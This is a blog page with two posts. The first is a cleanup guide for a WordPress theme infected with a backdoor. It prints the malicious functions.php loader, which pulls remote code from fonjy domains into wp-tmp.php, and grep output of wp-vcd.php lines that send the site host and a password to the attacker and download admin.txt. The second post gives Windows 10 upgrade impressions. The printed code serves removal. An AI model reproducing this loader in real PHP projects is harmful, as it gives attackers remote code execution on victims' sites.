Code Optimization

Interesting things about software development and code optimization

PHP Theme and malware

Hello,


Today I have found a way to clean-up one of a PHP Theme that pops-up ads from time to time on your website.

so just in case anyone will look for the same problem solving - here what I did for it:

- in my case it created wp-tmp.php file under the theme folder so I searched for the file name inside of each file:

grep --include=*.php -rn . -e "wp-tmp.php"

it will show you something like that:

./wp-content/themes/betheme/functions.php:106:                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

./wp-content/themes/betheme/functions.php:108:                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {

./wp-content/themes/betheme/functions.php:109:                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);

./wp-content/themes/betheme/functions.php:110:                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {

./wp-content/themes/betheme/functions.php:111:                        @file_put_contents('wp-tmp.php', $tmpcontent);

./wp-content/themes/betheme/functions.php:123:                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

./wp-content/themes/betheme/functions.php:125:                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {

./wp-content/themes/betheme/functions.php:126:                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);

./wp-content/themes/betheme/functions.php:127:                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {

./wp-content/themes/betheme/functions.php:128:                        @file_put_contents('wp-tmp.php', $tmpcontent);

./wp-content/themes/betheme/functions.php:133:        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {

./wp-content/themes/betheme/functions.php:136:        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {

./wp-content/themes/betheme/functions.php:139:        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {

btw, do not forget to delete all wp-tmp.php files :)

- after that open the functions.php file and remove the following lines:

$wp_auth_key='ee10bb8873fd72fe5d1585ebddeeae7e';
        if (($tmpcontent = @file_get_contents("https://www.fonjy.cc/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.fonjy.cc/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("https://www.fonjy.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif (($tmpcontent = @file_get_contents("https://www.fonjy.top/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.fonjy.top/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        }

in my case it was starting on 101 line number.

- now run the following command:
grep --include=*.php -rn . -e "fonjy"
and you should get something similar to:
./wp-includes/wp-vcd.php:83:						$content = @file_get_contents('https://www.fonjy.cc/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);

./wp-includes/wp-vcd.php:84:						@file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('https://www.fonjy.cc/admin.txt'));

./wp-includes/wp-vcd.php:88:						$content = @file_get_contents('https://www.fonjy.cc/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);

./wp-includes/wp-vcd.php:89:						@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('https://www.fonjy.cc/admin.txt'));

I removed the wp-vcd.php file completely and the class.wp.php as well (even it was in 0 size)


Now it should not return back to you website anymore (do not forget to remove 777 permission everywhere)


Thank you for reading it and see you

1vqHSTrq1GEoEF7QsL8dhmJfRMDVxhv2y



Windows 10 - My First Impression

Hello my friends,


Yesterday I did upgrade my Windows 8.1 x64 up to Windows 10 x64 and want to share my impression.

Here are main points about Windows 10 so far:

- start up takes longer (my win 8.1 did start up in about 3-5 sec)

- singing in takes longer (under win 8.1 it took about 3-5 sec to sing in and get to desktop)

- whole system looks heavier, the Microsoft Edge seems clumsy and buggy - it has crashed a lot of times during two days.

- problem with Visual Studio 2010 ( first problem was about msvcr100.dll after a few hours I managed it by copy-paste msvcr100.dll from VS 2010 installation folder to SysWOW64 but after that I got another problem with VS 2010 SP 1, I was unable to uninstall it completely and it was requiring something like Visual Studio 2010 Shell Isolated ENU and only fix seems fine for me is this )

updated on 08/03/2015

- the most strange thing is UAC screen, today I noticed that Java Update passed my UAC control itself after a few minutes while I was out of my laptop, I think that this is a big security problem.


So my impression so far is about 4 from 5 points, we have one month to roll back windows 10 to previous system,

so I will update this post in the nearest future.


Thank you


1vqHSTrq1GEoEF7QsL8dhmJfRMDVxhv2y